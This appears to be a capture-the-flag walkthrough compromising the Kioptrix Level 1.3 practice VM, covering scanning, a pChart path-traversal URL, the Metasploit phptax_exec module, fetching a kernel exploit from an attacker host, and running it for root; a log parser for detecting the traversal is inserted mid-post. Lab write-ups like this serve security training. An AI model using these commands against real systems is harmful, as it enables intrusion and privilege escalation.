Hack the Kioptrix VM (CTF Challenge)

Today we are going to solve Kioptrix: Level 1.3 (#4). It is part of a Boot2Root series provided for practice. The hints we have from the author are:

  • It’s possible to remotely compromise the machine
  • Stays within the target audience of this site
  • Must be “realistic” (well kinda…)
  • Should serve as a refresher for me. Be it PHP or MySQL usage etc.

So basically, its difficulty level ranges from beginner to intermediate. Let's try to break through it. But first, note that you can download it from https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

Walkthrough

As always, start off by finding the target.

netdiscover

And so our target is 192.168.0.101. We will now scan it via nmap.

nmap -p- -A 192.168.0.101

From the nmap result you can see that an HTTP service is running on two ports, 80 and 8080, along with an SSH service on port 22. As we have an HTTP service running, we should try to open it in our browser.

There is nothing on the webpage except that it says “it works!”, so let’s have a look at its source code.

In its source code there is a URL mentioned, i.e. pChart2.1.3/index.php. Open this URL.

And so the URL opens and takes us to a PHP library. pChart is basically a PHP library that helps us create or manage anti-aliased charts or pictures directly from the web server. I searched Google to learn more about it and stumbled upon some useful information, i.e. that this version of pChart was vulnerable. Therefore, I searched for its exploit on exploit-db.com.

And so I found an appropriate exploit. When you explore the exploit there is a link given:

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

I opened this link, except that I used the VM’s IP, and found the following page:

The information on this page isn’t useful at all. Then I remembered that an HTTP service was open on port 8080 too. So I opened the IP on port 8080.
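From the defender’s side, the traversal request shown above leaves a clear trace in the web server’s access log. The following Python is an added example, not part of the original post: it parses constructed Apache combined-format log lines (sample data), percent-decodes each query parameter until it is stable so that double-encoding cannot hide the “..” sequence, and reports every request that aims a parameter such as pChart’s Script at a path outside the examples directory.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format access-log lines (sample data, not from the post).
# Line 2 carries the traversal request from the pChart exploit; line 3 double-encodes it.
SAMPLE_LOG = """\
192.168.0.50 - - [10/Mar/2024:10:01:02 +0000] "GET /pChart2.1.3/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Mar/2024:10:01:09 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1680 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Mar/2024:10:01:15 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 221 "-" "Mozilla/5.0"
192.168.0.77 - - [10/Mar/2024:10:02:00 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=Example01.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path component delimited by slashes (or backslashes), e.g. "/../" or "..\".
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def full_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded traversal (%252e%252e) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(log_text):
    """Return (ip, status, param, decoded_value) for each query parameter that
    contains a ".." path component or names an absolute path under /etc/."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip it
        query = urlsplit(m.group("target")).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = full_decode(raw)  # parse_qsl decoded once; peel any further layers
            if TRAVERSAL_RE.search(value) or value.startswith("/etc/"):
                hits.append((m.group("ip"), m.group("status"), name, value))
    return hits


if __name__ == "__main__":
    for ip, status, name, value in find_traversal(SAMPLE_LOG):
        print(f"{ip} status={status} {name}={value!r}")
```

Note that the 403 line is still reported: a blocked attempt is as useful to an analyst as a successful one, since it shows who is probing the Script parameter.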

But the access was forbidden. I tried every method to bypass this forbidden access, but nothing worked other than changing the user agent. So to access this page, go to the Tools menu from the menu bar. A drop-down menu will appear. From this menu select Default User Agent. Another menu will open; from this select Internet Explorer, and from the menu that opens next select Internet Explorer 6.

And fortunately we now have access to the page, where we find a directory called phptax/.

Now open this link and you will see the following page:

The page belongs to phptax. Phptax is a kind of CMS for Linux. Its aim is to develop a tax program which uses a databaseless methodology that fits in one-line text files. Using Phptax does not require the SQL databases that are generally used in this kind of program. And to our luck there is an exploit for Phptax in Metasploit; to find it, simply type search phptax in Metasploit.

To use this exploit, simply type the following in Metasploit:

use exploit/multi/http/phptax_exec

set rhost 192.168.0.101

set rport 8080

exploit

After this, you will directly reach the shell; then type:

id

uname -a

These commands show the current user id and the version of the kernel.

There is an exploit for this version of the kernel on exploit-db.com. Download it and save the file as shown:

Next, type the following command on the target to get the exploit from its default location:

fetch http://192.168.0.104/28818.c

Here, we used the fetch command because the wget command wasn’t working, as the security level here was a bit high. So fetch serves as a substitute for wget, and we download the file directly from the web server.

Then type the following set of commands to compile and execute the exploit:

ls

gcc -o exploit 28818.c

ls

chmod 777 exploit

./exploit

As the exploit executes you will get root. To confirm this, type:

id

Then, moving forward, go to the root folder by typing:

cd /root

Let’s see what files it has; for that, type:

ls

Here we have a text file named congrats.txt, and I am hoping this will be our flag, so to read it type:

cat congrats.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.